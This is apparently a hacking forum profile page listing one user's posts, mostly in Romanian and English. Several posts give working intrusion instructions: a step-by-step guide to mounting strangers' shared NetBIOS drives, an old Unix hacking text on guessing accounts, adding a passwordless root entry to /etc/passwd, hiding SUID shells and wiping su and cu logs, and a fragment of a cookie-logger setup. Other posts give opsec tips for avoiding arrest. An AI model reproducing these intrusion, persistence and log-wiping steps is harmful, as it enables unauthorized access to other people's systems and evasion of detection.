Jump to content

Criminal

Active Members
  • Posts

    166
  • Joined

  • Last visited

    Never

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Criminal's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. On English: It is a better way to hack netbios, its easier, quicker, and more user friendly. First you port scan. You look for people with the port 139 on. If they do, they might be hackable. Open DOS, or cmd.exe (depending on your OS). Put this in c:windows>nbtstat -a xxx.xxx.xxx.xxx You will see one of two things. 1. Host not found This means that you can't hack them. (With your skills) 2.Something like this: NetBIOS Remote Machine Name Table Name Type Status ------------------------------------------------------------------------------------------------- user <00> UNIQUE Registered workgroup <00> GROUP Registered user <03> UNIQUE Registered user <20> UNIQUE Registered MAC Address = 00-02-44-14-23-E6 See the little 20? That means their sharing something there. Next we put c:windows>net view xxx.xxx.xxx.xxx This will show the shared drives, it will look something like this Shared resources at xxx.xxx.xxx.xxx ComputerNameGoesHere Share name Type Used as Comment ----------------------------------------------------------------------------------------------- CDISK Disk This means they are sharing their C drive. To put the drive on your "My Computer" we will use this command c:windows>net use k: xxx.xxx.xxx.xxxCDISK The k: is the name to put as the drive name on your "My Computer". You can use any letter not currently used in your "My Computer". The CDISK part is the name of the drive that was listed in the net use command. So if net use table looked like this: Shared resources at xxx.xxx.xxx.xxx ComputerNameGoesHere Share name Type Used as Comment ----------------------------------------------------------------------------------------------- FDISK Disk that means we would put c:windows>net use k: xxx.xxx.xxx.xxxFDISK Enjoy!!!
  2. 6. Not using proxies 7. Thinking nobody can track you when you've used a ap in starbucks, forgetting about the cameras and not realising what a mac address is 8. Telling everybody you meet your a hacker/ posting it anywhere associated with your real identity i.e myspace 9. Accepting money for a 'job' and accepting money to your real paypal/ sending it to your real bank account 10. Talking to idiots that can't keep their mouth shut
  3. Criminal

    Sal All

    Parerea ta
  4. Criminal

    Sal All

    "E belea ... " forumul ? sau ce ?
  5. Nu-i lung acest tutorial sa zici ca nu ai rabdare sa-l citesti,asa ca Bafta! "Lame crackers super-eleet techneeq" AT number 5: Always remember to attack systems close to you. Do so in person if possible. For example, walk into a public access place (say a cybercafe) with a disc containing loads of script kiddie tools. Be sure they know you personally by name (ideally with your address) and be sure to get caught on the CCTV. Then make a blatant attack. Leave a load of SK tools on the machine, leave a disc on the drive (ideally containing your email address), and trigger off their AV and IDS software. Then walk out (assuming you aren't busted by then). Those cops are sure to come a knocking... AT number 4: Attack a system you have legitimate access to. This is obvious, because as a legitimate system (for instance your ISP, school or work), they already know who you are and have all your details. Try to gain root on your ISP's mail server. Try to crack your school teacher's password. Then be sure to leave all the files in your own account space, just so they can't confuse you with anybody else. Ideally leave a file called "teachers passwords.txt" on your desktop. AT number 3: Remember to use tools which trigger AV and IDS, after all you wouldn't want them not to notice your attacks, right? SK tools are commonly listed in AV and IDS databases, so they should be your first port of call. AT number 2: Keep a load of clearly labelled plaintext files stored unencrypted on the HD of a machine used only by you. Make sure they are properly organised into folders "my_hacking_info" "my_hacking_tools" and "boxes_i_have_rooted.txt". Then you are sure to be totally in the shit if the box is ever siezed. But by FAR out ahead, at number 1: Deface a web site and put your name on it
  6. Ce Copil distrus,nu am vazut asa ceva in viata mea,Doamne Fereste!!!!!! ce nebun...
  7. Care stie sa mareasca ecranu acolo la you tube ? Link : http://youtube.com/watch?v=Fu4-f2t5LrE&search=
  8. ------------------- The C compiler ------------------- This Will be BRIEF. Why? Becuase if you want to learn C, go buy a book. I don't have time to write another text file on C, for it would be huge. Basically, most executables are programmed in C. Source code files on unix are found as filename.c . To compile one, type in "cc filename.c". Not all C programs will compile, since they may depend on other files not there, or are just modules. If you see a think called "makefile" you can usually type in just "make" at the command prompt, and something will be compiled, or be attempted to compile. When using make or CC, it would be wise to use the background operand since compiling sometimes takes for ever. IE: $ cc login.c& [1234] $ (The 1234 was the process # it got identified as). _____________________________________________________________________________ -------------- Hacking: -------------- The first step in hacking a UNIX is to get into the operating system by finding a valid account/password. The object of hacking is usually to get root (full privileges), so if you're lucky enough to get in as root, you need not read anymore of this hacking phile , and get into the "Having Fun" Section. Hacking can also be just to get other's accounts also. Getting IN ---------- The first thing to do is to GET IN to the Unix. I mean, get past the login prompt. That is the very first thing. When you come across a UNIX, sometimes it will identify itself by saying something like, "Young INC. Company UNIX" or Just "Young Inc. Please login" Here is where you try the defaults I listed. If you get in with those you can get into the more advanced hacking (getting root). If you do something wrong at login, you'll get the message "login incorrect" This was meant to confuse hackers, or keep the wondering. Why? Well, you don't know if you've enterred an account that does not exist, or one that does exist, and got the wrong password. If you login as root and it says "Not on Console", you have a problem. You have to login as someone else, and use SU to become root. Now, this is where you have to think. If you cannot get in with a default, you are obviously going to have to find something else to login as. Some systems provide a good way to do this by allowing the use of command logins. These are ones which simply execute a command, then logoff. However, the commands they execute are usually useful. For instance there are three common command logins that tell you who is online at the present time. They are: who rwho finger If you ever successfully get one of these to work, you can write down the usernames of those online, and try to logon as them. Lots of unsuspecting users use there login name as their password. For instance, the user "bob" may have a password named "bob" or "bob1". This, as you know, is not smart, but they don't expect a hacking spree to be carried out on them. They merely want to be able to login fast. If a command login does not exist, or is not useful at all, you will have to brainstorm. A good thing to try is to use the name of the unix that it is identified as. For instance, Young INC's Unix may have an account named "young" Young, INC. Please Login. login: young UNIX SYSTEM V REL 3.2 ©1984 AT&T.. .. .. .. Some unixes have an account open named "test". This is also a default, but surprisingly enough, it is sometimes left open. It is good to try to use it. Remember, brainstorming is the key to a unix that has no apparent defaults open. Think of things that may go along with the Unix. type in stuff like "info", "password", "dial", "bbs" and other things that may pertain to the system. "att" is present on some machines also. ONCE INSIDE -- SPECIAL FILES ---------------------------- There are several files that are very important to the UNIX environment. They are as follows: /etc/passwd - This is probably the most important file on a Unix. Why? well, basically, it holds the valid usernames/passwords. This is important since only those listed in the passwd file can login, and even then some can't (will explain). The format for the passwordfile is this: username:password:UserID:GroupID:Description(or real name):homedir:shell Here are two sample entries: sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/sh demo::101:100:Test Account:/usr/demo:/usr/sh In the first line, sirhack is a valid user. The second field, however, is supposed to be a password, right? Well, it is, but it's encrypted with the DES encryption standard. the part that says "&a,Ty" may include a date after the comma (Ty) that tells unix when the password expires. Yes, the date is encrypted into two alphanumeric characters (Ty). In the Second example, the demo account has no password. so at Login, you could type in: login: demo UNIX system V ©1984 AT&T .. .. But with sirhack, you'd have to enter a password. Now, the password file is great, since a lot of times, you;ll be able to browse through it to look for unpassworded accounts. Remember that some accounts can be restricted from logging in, as such: bin:*:2:2:binaccount:/bin:/bin/sh The '*' means you won't be able to login with it. Your only hope would be to run an SUID shell (explained later). A NOTE ABOUT THE 'DES" ENCRYPTION: each unix makes its own unique "keyword" to base encryption off of. /etc/group - This file contains The valid groups. The group file is usually defined as this: groupname:password:groupid:users in group Once again, passwords are encrypted here too. If you see a blank in the password entry you can become part of that group by using the utility "newgrp". Now, there are some cases in which even groups with no password will allow only certain users to be assigned to the group via the newgrp command. Usually, if the last field is left blank, that means any user can use newgrp to get that group's access. Otherwise, only the users specified in the last field can enter the group via newgrp. Newgrp is just a program that will change your group current group id you are logged on under to the one you specify. The syntax for it is: newgrp groupname Now, if you find a group un passworded, and use newgrp to enter it, and it asks for a password, you are not allowed to use the group. I will explain this further in The "SU & Newgrp" section. /etc/hosts - this file contains a list of hosts it is connected to thru a hardware network (like an x.25 link or something), or sometimes just thru UUCP. This is a good file when you are hacking a large network, since it tells you systems you can use with rsh (Remote Shell, not restricted shell), rlogin, and telnet, as well as other ethernet/x.25 link programs. /usr/adm/sulog (or su_log) - the file sulog (or su_log) may be found in Several directories, but it is usually in /usr/adm. This file is what it sounds like. Its a log file, for the program SU. What it is for is to keep a record of who uses SU and when. whenever you use SU, your best bet would be to edit this file if possible, and I'll tell you how and why in the section about using "su". /usr/adm/loginlog or /usr/adm/acct/loginlog - This is a log file, keeping track of the logins. Its purpose is merely for accounting and "security review". Really, sometimes this file is never found, since a lot of systems keep the logging off. /usr/adm/errlog or errlog - This is the error log. It could be located anywhere. It keeps track of all serious and even not so serious errors. Usually, it will contain an error code, then a situation. the error code can be from 1-10, the higher the number, the worse the error. Error code 6 is usually used when you try to hack. "login" logs your attempt in errlog with error code 6. Error code 10 means, in a nutshell, "SYSTEM CRASH". /usr/adm/culog - This file contains entries that tell when you used cu, where you called and so forth. Another security thing. /usr/mail/<userLogin> - this is where the program "mail" stores its mail. to read a particular mailbox, so they are called, you must be that user, in the user group "mail" or root. each mailbox is just a name. for instance, if my login was "sirhack" my mail file would usually be: /usr/mail/sirhack /usr/lib/cron/crontabs - This contains the instructions for cron, usually. Will get into this later. /etc/shadow - A "shadowed" password file. Will talk about this later. -- The BIN account -- Well, right now, I'd like to take a moment to talk about the account "bin". While it is only a user level account, it is very powerful. It is the owner of most of the files, and on most systems, it owns /etc/passwd, THE most important file on a unix. See, the bin account owns most of the "bin" (binary) files, as well as others used by the binary files, such as login. Now, knowing what you know about file permissions, if bin owns the passwd file, you can edit passwd and add a root entry for yourself. You could do this via the edit command: $ ed passwd 10999 [The size of passwd varies] * a sirhak::0:0:Mr. Hackalot:/:/bin/sh {control-d} * w * q $ Then, you could say: exec login, then you could login as sirhack, and you'd be root. Some tips: 1. Don't give it out. If the sysadm sees that joeuser logged in 500 times in one night....then.... 2. Don't stay on for hours at a time. They can trace you then. Also they will know it is irregular to have joeuser on for 4 hours after work. 3. Don't trash the system. Don't erase important files, and don't hog inodes, or anything like that. Use the machine for a specific purpose (to leech source code, develop programs, an Email site). Dont be an asshole, and don't try to erase everything you can. 4. Don't screw with users constantly. Watch their processes and run what they run. It may get you good info (snoop!) 5. If you add an account, first look at the accounts already in there If you see a bunch of accounts that are just 3 letter abbrv.'s, then make yours so. If a bunch are "cln, dok, wed" or something, don't add one that is "joeuser", add one that is someone's full initials. 6. When you add an account, put a woman's name in for the description, if it fits (Meaning, if only companies log on to the unix, put a company name there). People do not suspect hackers to use women's names. They look for men's names. 7. Don't cost the Unix machine too much money. Ie.. don't abuse an outdial, or if it controls trunks, do not set up a bunch of dial outs. If there is a pad, don't use it unless you NEED it. 8. Don't use x.25 pads. Their usage is heavily logged. 9. Turn off acct logging (acct off) if you have the access to. Turn it on when you are done. 10. Remove any trojan horses you set up to give you access when you get access. 11. Do NOT change the MOTD file to say "I hacked this system" Just thought I'd tell you. Many MANY people do that, and lose access within 2 hours, if the unix is worth a spit. 12. Use good judgement. Cover your tracks. If you use su, clean up the sulog. 13. If you use cu, clean up the cu_log. 14. If you use the smtp bug (wizard/debug), set up a uid shell. 15. Hide all suid shells. Here's how: goto /usr (or any dir) do: # mkdir ".. " # cd ".. " # cp /bin/sh ".whatever" # chmod a+s ".whatever" The "" are NEEDED to get to the directory .. ! It will not show up in a listing, and it is hard as hell to get to by sysadms if you make 4 or 5 spaces in there (".. "), because all they will see in a directory FULL list will be .. and they won't be able to get there unless they use "" and know the spacing. "" is used when you want to do literals, or use a wildcard as part of a file name. 16. Don't hog cpu time with password hackers. They really don't work well. 17. Don't use too much disk space. If you archieve something to dl, dl it, then kill the archieve. 18. Basically -- COVER YOUR TRACKS.
  9. Criminal

    searchlores.org

    De acord
  10. welcome , al catelea care nu stie romana ? mai era inca unu din USA parca
  11. Frumoasa lista ,dar si mai frumos e site-ul,mersi ca mi l-ai reamintit .
  12. Criminal

    eddie47

    La multi ani we sa-ti creasca mare
  13. mersi irc_boy , cand am vrut sa-l pun mi-o dat erroare. Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator to inform of the time the error occurred and of anything you might have done that may have caused the error. More information about this error may be available in the server error log. nu e postat tot mai trebuia: <input value="[HERE MEMBERID EXAMPLE: 2]" name="memberID" type="hidden"> <input value="Message" name="message" size="16" maxlength="300" onfocus="if (this.value == 'Message')this.value=''" type="text"> <input name="submit" value="Shout" type="submit"> </form> </center> ----------------------------------------------- Create the page cookielogger.php & logfile.txt -----------------------------------------------
  14. yeahh,dar e bun tutorialul ? a?
×
×
  • Create New...